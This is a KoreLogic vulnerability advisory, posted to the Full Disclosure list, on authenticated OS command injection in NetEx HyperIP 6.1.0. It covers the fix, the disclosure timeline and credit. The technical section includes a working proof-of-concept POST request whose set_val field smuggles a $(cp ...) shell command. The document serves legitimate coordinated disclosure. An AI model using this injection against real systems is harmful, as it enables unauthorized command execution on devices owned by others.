KL-001-2018-003 : NetEx HyperIP Post-Auth Command Execution

Title: NetEx HyperIP Post-Auth Command Execution
Advisory ID: KL-001-2018-003
Publication Date: 2018.02.08
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-003.txt


1. Vulnerability Details

     Affected Vendor: NetEx
     Affected Product: HyperIP
     Affected Version: 6.1.0
     Platform: Embedded Linux
     CWE Classification: CWE-78:  Improper Neutralization of Special Elements 
used in an OS Command, CWE-250: Execution
with Unnecessary Privileges
     Impact: Arbitrary Command Execution
     Attack vector: HTTPS

2. Vulnerability Description

     A command injection vulnerability can be leveraged to execute
     operating system commands.

3. Technical Description

     A POST variable is handled unsafely, allowing execution of arbitrary
     commands with the privileges of the webserver process.  In the below
     example, set_val= is used to copy an existing executable file into
     a writable directory.

       POST /hypmisc.php HTTP/1.1
       Host: 1.3.3.7
       Accept-Language: en-US,en;q=0.5
       Cookie: auth-token=b6b73844ce4df64f459948c5475a1096
       DNT: 1
       Connection: close
       Upgrade-Insecure-Requests: 1
       Content-Type: application/x-www-form-urlencoded
       Content-Length: 99

       set_id=msglvl&set_val=$(cp /etc/profile.d/which-2.sh 
/var/ftp/pub/updates/a.run)&perm=on&submit=Set

       HTTP/1.1 200 OK
       Date: Mon, 27 Mar 2017 07:20:56 GMT
       Server: Apache/2.2.3 (CentOS)
       X-Powered-By: PHP/5.1.6
       Expires: Thu, 19 Nov 1981 08:52:00 GMT
       Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0
       Pragma: no-cache
       Content-Length: 1057
       Connection: close
       Content-Type: text/html; charset=UTF-8

4. Mitigation and Remediation Recommendation

     The vendor has released version 6.1.1 of HyperIP, which they state
     addresses this vulnerability.

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2017.07.24 - KoreLogic submits vulnerability details to NetEx.
     2017.07.24 - NetEx confirms receipt.
     2017.08.16 - NetEx informs KoreLogic that this and other reported
                  vulnerabilities have been addressed in the forthcoming
                  release. ETA as of yet undetermined.
     2017.09.05 - 30 business days have elapsed since the vulnerability
                  was reported to NetEx.
     2017.09.19 - NetEx informs KoreLogic that the forthcoming release
                  6.1.1 is expected to ship at the end of January 2018.
     2017.09.26 - 45 business days have elapsed since the vulnerability
                  was reported to NetEx.
     2017.12.01 - 90 business days have elapsed since the vulnerability
                  was reported to NetEx.
     2018.01.17 - 120 business days have elapsed since the vulnerability
                  was reported to NetEx.
     2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release
                  has gone live.
     2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description.


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to